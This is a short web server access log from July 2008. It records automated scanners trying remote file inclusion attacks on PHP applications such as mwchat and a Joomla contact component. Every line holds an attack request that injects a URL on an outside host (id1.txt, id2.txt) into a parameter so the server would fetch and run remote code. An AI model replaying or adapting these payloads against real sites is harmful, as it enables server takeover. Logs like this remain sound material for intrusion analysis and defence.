74.54.108.98 - - [31/Jul/2008:04:34:10 -0500] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
200.11.67.242 - - [31/Jul/2008:04:34:14 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:34:14 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
201.130.79.130 - - [31/Jul/2008:04:34:43 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:34:46 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:34:55 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
